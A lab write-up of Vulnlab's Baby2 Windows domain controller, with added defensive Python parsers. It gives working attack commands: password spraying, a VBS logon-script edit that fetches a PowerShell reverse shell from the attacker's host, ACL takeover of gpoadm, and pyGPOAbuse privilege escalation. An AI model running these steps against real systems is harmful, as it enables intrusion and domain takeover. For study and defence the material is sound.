# Vulnlab’s Baby2 (Medium) Windows Machine – Writeup

Hello everyone! This is a writeup of Vulnlab's Baby2 machine. Baby2 is a Medium-rated Windows machine. It is one of [TJNull's OSCP-like machines](https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview#).
# Summary

Initial access comes from finding a valid set of credentials that has extensive permission to write on a share hosting a VB script. Replacing the script with a malicious one gets our initial shell as user `Amelia.Griffiths`. From there, we can enumerate AD further to find interesting ACLs that the user `Amelia.Griffiths` has on the `gpoadm` user.

Further, the `gpoadm` user has "GenericAll" rights over 2 GPOs. Using pyGPOAbuse, we can create and execute a scheduled task as SYSTEM to add `gpoadm` to the local Administrators group, granting us administrator access.
# Enumeration
## NMAP Scan ##

```bash
└─➜ sudo rustscan --ulimit 5000 -b 500 -a 10.10.110.149 -- -sC -sV -Pn | tee baby2.nmap
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.110.149:53
Open 10.10.110.149:88
Open 10.10.110.149:135
Open 10.10.110.149:139
Open 10.10.110.149:389
Open 10.10.110.149:445
Open 10.10.110.149:464
Open 10.10.110.149:593
Open 10.10.110.149:636
Open 10.10.110.149:3268
Open 10.10.110.149:3269
Open 10.10.110.149:3389
Open 10.10.110.149:9389
```
- Open ports 53, 88 and 389 (DNS, Kerberos and LDAP) are typical of a Domain Controller.
- A quick nxc scan confirms that we are indeed dealing with a DC.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421220433.png)
- Anonymous login is also enabled, and there are shares with read and write privileges.

## Service Enumeration ##

- Let's dig deeper into the SMB service.
- I'm going to use impacket's smbclient.py to connect and enumerate the shares.

```bash
# impacket expects domain/user@target; the username can be anything since anonymous access is enabled
smbclient.py baby2.vl/sdaasda@10.10.110.149
```
### Enumerating apps share

```bash
# inside the smbclient.py prompt
shares            # list all the shares
use <share_name>  # select a share
mget *            # download all files present in the current directory
```

- Two files are present: CHANGELOG and login.vbs.lnk.
- Download both files.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421221134.png)
- The CHANGELOG file hints at some automation activity.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421221708.png)
- Running strings on login.vbs.lnk shows that the login.vbs script is most likely fetched from the SYSVOL share. But we do not have access to the SYSVOL share.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421231953.png)
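Instead of eyeballing `strings` output, the working directory and target of a shortcut can be read from the Shell Link StringData fields directly. The following is an added example (not code from the writeup): a minimal .lnk parser that skips the IDList and LinkInfo blocks and reports any UNC paths, which is how a defender can triage shortcuts found on shares and see which ones pull scripts from SYSVOL or NETLOGON. The sample shortcut it builds is constructed, and the paths in it are assumptions, not the lab's real values.

```python
import struct

# LinkFlags bits of the MS-SHLLINK ShellLinkHeader (the u32 at offset 20)
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 1 << 0, 1 << 1, 1 << 7
STRING_FIELDS = ((1 << 2, "name"), (1 << 3, "relative_path"), (1 << 4, "working_dir"),
                 (1 << 5, "arguments"), (1 << 6, "icon"))   # StringData order in the file
LNK_HEADER = (b"\x4c\x00\x00\x00"                           # HeaderSize = 76
              + b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")  # LinkCLSID

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shortcut, skipping IDList/LinkInfo when present."""
    if data[:20] != LNK_HEADER:
        raise ValueError("not a .lnk file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                                # end of the fixed header
    if flags & HAS_ID_LIST:                                 # u16 IDListSize + body
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                               # u32 LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, not bytes
            raw = data[pos + 2:pos + 2 + count * width]
            fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    return fields

def unc_paths(fields: dict) -> list:
    """Values that point at a network share, e.g. a logon script pulled from SYSVOL or NETLOGON."""
    return sorted(v for v in fields.values() if v.startswith("\\\\"))

def build_sample_lnk(relative_path: str, working_dir: str, arguments: str, id_list: bytes = b"") -> bytes:
    """Constructed minimal .lnk used only to exercise the parser (no LinkInfo block)."""
    flags = (1 << 3) | (1 << 4) | (1 << 5) | IS_UNICODE | (HAS_ID_LIST if id_list else 0)
    header = LNK_HEADER + struct.pack("<I", flags) + b"\x00" * 52      # pad to 76 bytes
    body = struct.pack("<H", len(id_list)) + id_list if id_list else b""
    body += b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                     for s in (relative_path, working_dir, arguments))
    return header + body

if __name__ == "__main__":
    # assumed paths modelled on a logon-script shortcut; the lab's real values are not on the page
    sample = build_sample_lnk(r"..\..\Windows\System32\wscript.exe",
                              r"\\baby2.vl\SYSVOL\baby2.vl\scripts", "login.vbs",
                              id_list=b"\x00\x00")                      # IDList holding only the TerminalID
    print(parse_lnk(sample))
    print(unc_paths(parse_lnk(sample)))
```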
### Enumerating homes share

- The homes share is where we have read and write privileges.
- It looks like the C:\Users folder, as it reveals many usernames.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421224521.png)

- Since there are many folders, we can use nxc's spider_plus module to look recursively into each folder and identify any interesting files.
- Apparently there are no files inside any of the folders.

```bash
nxc smb 10.10.110.149 -u 'dsad' -p '' --shares -M spider_plus
```

### Enumerating NETLOGON share

- Only one file is present: login.vbs.
- It looks like the automation script that the CHANGELOG talked about.

At this point, since we have a writable share, I tried the [scf attack](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) on the homes share, but it was unsuccessful: no interaction was received on Responder to grab hashes.
## Initial Access ##

- With the usernames we got, let's check whether they are valid and whether any AS-REP roastable users are present.

```bash
# usernames: the list of names collected from the homes share
kerbrute userenum --dc 10.10.110.146 -d baby2.vl usernames
```
![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240421231328.png)
- All users are valid and no AS-REP roastable users are present.
- The next step would be to check the users' descriptions, but LDAP anonymous bind is not enabled, which stops us from doing a few more checks.
- With no hints about passwords, our only option is to try brute force with usernames as passwords.

```bash
nxc smb 10.10.101.190 -u usernames -p usernames --no-bruteforce --continue-on-success
```
- The `--no-bruteforce` flag pairs line 1 of the user list with line 1 of the password list (and so on) instead of trying every combination, and `--continue-on-success` keeps going after the first valid combination instead of stopping.

Excellent! We got two user accounts with a valid combination.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422182116.png)

### Enumerating Permissions

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422192917.png)
- Both users have read & write access to the apps & docs shares. But it's always best to check the access manually on the shares, as we cannot rely fully on the tool's output.
- Since we have access to the apps folder, I tried to replace login.vbs.lnk with a [malicious lnk file](https://github.com/blacklanternsecurity/mklnk) so that we could get the required interaction on Responder to capture the NET-NTLMv2 hash.
- But no luck there: the share allows us to upload new files but not to replace an existing one.
- No interesting files under the `docs` directory either.
- We are left with SYSVOL. Upon enumeration it holds the login.vbs file that the .lnk points to, as previously mentioned, and surprisingly we are allowed to put/replace files in that share.
- Now the initial access is taking shape: since a VB script is present, we can put a VBS reverse shell inside the script to get our initial shell.
- I have added a VBS WScript.Shell execution snippet to login.vbs that launches my ConPtyShell reverse shell.

```vb
Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("powershell.exe IEX(IWR http://10.8.2.13:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.8.2.13 4444")
```

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422203333.png)

- Let's upload it to SYSVOL and wait for the callback.
- Finally, we got our reverse shell as user Amelia.Griffiths.

# AD Enumeration #

- As usual, the first step is to check our privileges with `whoami /priv`, and we don't see any privileges that we can abuse to escalate.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422203706.png)
- Using PowerView, let's start enumerating the AD.
- Whenever I'm on an AD network, below are a few things that I do no matter what, to get an overview of the field I'm in. Most of the time these give quick wins or help us understand the next possible steps:
	- Enumerate Users
	- Enumerate Users description
	- Enumerate Computers
	- Enumerate Domain shares
	- Enumerate Groups
	- Enumerate Non-Default group's members
	- Enumerate Domain Admin group members
	- Enumerate Interesting ACLs
	- Enumerate Kerberoastable users
	- Enumerate AS-REP roastable users
	- Enumerate LAPS Delegated groups
	- Enumerate Unconstrained delegation
	- Enumerate Users & Computers with Constrained delegation

## Enumerating Interesting ACLs

```powershell
Invoke-ACLScanner -ResolveGUID
```

- Looks like the gpoadm object has "GenericAll" access to group policies (snipped in the screenshot).
- Also, the legacy object has WriteDACL and WriteOwner access on the gpoadm and gpo-management objects.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422204929.png)
![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422205009.png)
- We are also part of the legacy group, so we can take over the gpoadm user and then abuse its GenericAll access on group policies to escalate our privileges.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422205204.png)
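From a defender's side, the same chain can be found by treating the ACLs as a graph: group-membership edges plus rights that let a principal take control of the target object, then searching from any low-privileged user for a route to a GPO. This added example (not the writeup's, PowerView's or BloodHound's code) does that over a constructed ACE set modelled on the findings above; the GPO names `gpo-1` and `gpo-2` are placeholders because the page does not name the two policies.

```python
from collections import deque

# Rights that let the holder take control of the target object (PowerView/BloodHound names)
ABUSABLE_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns",
                   "ForceChangePassword", "AddMember", "AllExtendedRights"}

def build_graph(aces: list, memberships: list) -> dict:
    """principal -> [(target, edge_label)] built from group memberships and abusable ACEs."""
    graph = {}
    for member, group in memberships:
        graph.setdefault(member, []).append((group, "MemberOf"))
    for ace in aces:
        if ace["right"] in ABUSABLE_RIGHTS:               # ReadProperty & co. are not edges
            graph.setdefault(ace["principal"], []).append((ace["target"], ace["right"]))
    return graph

def escalation_paths(graph: dict, start: str, is_high_value) -> list:
    """BFS from start; one shortest path per reachable object for which is_high_value(name)."""
    paths, seen, queue = [], {start}, deque([[(start, None)]])
    while queue:
        path = queue.popleft()
        node = path[-1][0]
        if node != start and is_high_value(node):
            paths.append(path)
            continue                                      # stop at the objective
        for target, label in graph.get(node, []):
            if target not in seen:
                seen.add(target)
                queue.append(path + [(target, label)])
    return paths

def render(path: list) -> str:
    return " -> ".join(node if label is None else f"[{label}] {node}" for node, label in path)

# Constructed ACE set modelled on the writeup's findings; GPO names are placeholders
MEMBERSHIPS = [("amelia.griffiths", "legacy")]
ACES = [
    {"principal": "legacy", "target": "gpoadm", "right": "WriteDacl"},
    {"principal": "legacy", "target": "gpoadm", "right": "WriteOwner"},
    {"principal": "legacy", "target": "gpo-management", "right": "WriteDacl"},
    {"principal": "gpoadm", "target": "GPO:gpo-1", "right": "GenericAll"},
    {"principal": "gpoadm", "target": "GPO:gpo-2", "right": "GenericAll"},
    {"principal": "amelia.griffiths", "target": "gpoadm", "right": "ReadProperty"},
]

def find_gpo_paths(start: str = "amelia.griffiths") -> list:
    """Rendered paths from start to any GPO object; an empty list means no ACL route exists."""
    graph = build_graph(ACES, MEMBERSHIPS)
    return [render(p) for p in escalation_paths(graph, start, lambda n: n.startswith("GPO:"))]

if __name__ == "__main__":
    for line in find_gpo_paths():
        print(line)
```

Each rendered path is an ACE or membership to remove or review; once `legacy` loses WriteDacl/WriteOwner on `gpoadm`, the search from `amelia.griffiths` returns nothing.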

# Privilege Escalation #

## Takeover gpoadm

- The first step is to grant the legacy group (which we are a member of) GenericAll rights on gpoadm.

```powershell
Add-DomainObjectAcl -TargetIdentity "gpoadm" -PrincipalIdentity "legacy" -Domain baby2.vl -Rights All -Verbose
```

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422205721.png)

- With "GenericAll" rights, we can force-change the password of the gpoadm user.

```powershell
net user gpoadm Password1! /domain
```

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422210022.png)
- We have successfully changed the password.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422210451.png)

## BloodHound Enumeration ##
- We already know that the gpoadm user has GenericAll rights over group policy objects. We'll also use BloodHound to look into it.
- Spin up BloodHound CE:

```bash
curl -L https://ghst.ly/getbhce | sudo docker-compose -f - up
```

- Download the latest release of [bloodhound.py](https://github.com/dirkjanm/BloodHound.py/tree/bloodhound-ce) (bloodhound-ce branch), which is compatible with the CE edition:

```bash
bloodhound-python -d 'baby2.vl' -u 'gpoadm' -p 'Password1!' -c all -ns 10.10.101.190
```

- Upload the results to BloodHound. We can see the same result visually: the `gpoadm` user has `GenericAll` access over 2 group policy objects.

## Abusing GPO ##

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422212942.png)
- As per the recommendation by BloodHound CE, we'll use [pyGPOAbuse.py](https://github.com/Hackndo/pyGPOAbuse/blob/master/pygpoabuse.py). The GPO ID can be obtained from BloodHound itself by selecting the respective object.

```bash
python3 pygpoabuse.py baby2.vl/gpoadm:'Password1!' -gpo-id '6AC1786C-XXXXXXXXXXX-00C04FB984F9' -command 'net localgroup administrators gpoadm /add' -f -dc-ip 10.10.101.190
```

- Give the scheduled task a few minutes to run.
- We have successfully added the gpoadm user to the Administrators group.

![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422225019.png)
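pyGPOAbuse carries out this step by writing an immediate scheduled task into the GPO's ScheduledTasks.xml under SYSVOL (and bumping the GPO version so clients apply it), so that file is where the change is visible to a defender. The following added example (not the tool's or the writeup's code) audits such an XML for tasks that run as SYSTEM, are immediate, or carry a suspicious command line; the sample document is constructed to mirror the GPP layout, with placeholder clsid/uid values rather than real ones.

```python
import xml.etree.ElementTree as ET

# Command-line fragments that rarely belong in a legitimate GPO-deployed task
RISKY_FRAGMENTS = ("net localgroup administrators", "net user ", "net group ",
                   "powershell", "iex(", "downloadstring", "certutil -urlcache")

def audit_scheduled_tasks(xml_text: str) -> list:
    """Flag GPP tasks that run as SYSTEM, are immediate, or carry a suspicious command line."""
    findings = []
    for task in ET.fromstring(xml_text):                  # <TaskV2>/<ImmediateTaskV2> children
        props = task.find("Properties")
        if props is None:
            continue
        run_as = (props.get("runAs") or "").lower()
        for ex in props.iter("Exec"):
            cmd = ((ex.findtext("Command") or "") + " " + (ex.findtext("Arguments") or "")).strip()
            reasons = []
            if "system" in run_as:
                reasons.append("runs as SYSTEM")
            if task.tag == "ImmediateTaskV2":
                reasons.append("immediate task (fires at the next policy refresh)")
            hits = [f for f in RISKY_FRAGMENTS if f in cmd.lower()]
            if hits:
                reasons.append("suspicious command: " + ", ".join(hits))
            if reasons:
                findings.append({"task": task.get("name"), "command": cmd, "reasons": reasons})
    return findings

# Constructed sample mirroring the GPP ScheduledTasks.xml layout; clsid/uid values are placeholders
SAMPLE_XML = r"""<ScheduledTasks clsid="{CLSID-PLACEHOLDER}">
  <ImmediateTaskV2 clsid="{CLSID-PLACEHOLDER}" name="TASK_PLACEHOLDER" image="0" uid="{UID-PLACEHOLDER}">
    <Properties action="C" name="TASK_PLACEHOLDER" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3"><Actions Context="Author">
        <Exec><Command>cmd.exe</Command><Arguments>/c net localgroup administrators gpoadm /add</Arguments></Exec>
      </Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{CLSID-PLACEHOLDER}" name="Inventory" image="0" uid="{UID-PLACEHOLDER}">
    <Properties action="U" name="Inventory" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken">
      <Task version="1.3"><Actions Context="Author">
        <Exec><Command>inventory.exe</Command><Arguments>/quiet</Arguments></Exec>
      </Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

if __name__ == "__main__":
    for f in audit_scheduled_tasks(SAMPLE_XML):
        print(f["task"], "|", f["command"], "|", "; ".join(f["reasons"]))
```

Pair this with a check of the GPO version in GPT.INI and the SYSVOL file timestamps, since a version bump with no corresponding change in the Group Policy Management console is itself a signal.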

- Log in using impacket's psexec:

```bash
psexec.py gpoadm:'Password1!'@10.10.119.236
```
![](https://humbletester.com/wp-content/uploads/2024/04/Pasted-image-20240422225157.png)

We are now logged in as nt authority\\system. I hope you enjoyed this writeup. For any questions or suggestions, please feel free to connect with me on LinkedIn.
# References #

- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#writedacl--writeowner
- https://github.com/dirkjanm/BloodHound.py/tree/bloodhound-ce
- https://github.com/Hackndo/pyGPOAbuse/blob/master/pygpoabuse.py
- https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
